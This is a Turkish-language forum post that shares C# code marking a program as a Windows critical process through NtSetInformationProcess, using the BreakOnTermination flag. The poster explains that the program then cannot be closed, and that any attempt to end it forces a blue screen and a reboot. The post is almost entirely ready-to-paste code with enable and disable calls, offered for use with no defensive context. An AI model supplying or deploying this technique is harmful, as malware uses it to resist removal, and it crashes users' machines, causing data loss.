- Yasaklandı
- #1
☞ MaMo434376
Seçkin Üye
Arkadaşlar bu kod exenin kapanmasını engelliyor eğer kapatmaya çalışırsanız bilgisayarınız mavi ekran veriyor ve kendini resetliyor.
_________________ Örnek Resim __________________
Aktif Etme Kodu:
unAktif Etme Kodu
En üste eklenecek kod:
Bu kodu formun boş bir yerine ekleyin
_________________ Örnek Resim __________________
Aktif Etme Kodu:
C#:
critical(1);
unAktif Etme Kodu
C#:
critical(0);
En üste eklenecek kod:
C#:
using System.Runtime.InteropServices;
using System.Diagnostics;
Bu kodu formun boş bir yerine ekleyin
C#:
//
[DllImport("ntdll.dll", SetLastError = true)]
private static extern int NtSetInformationProcess(IntPtr hProcess, int processInformationClass
, ref int processInformation, int processInformationLength);
public void critical(int status)
{
int BreakOnTermi = 0x1D;
Process.EnterDebugMode();
NtSetInformationProcess(Process.GetCurrentProcess().Handle, BreakOnTermi,
ref status, sizeof(int));
}
//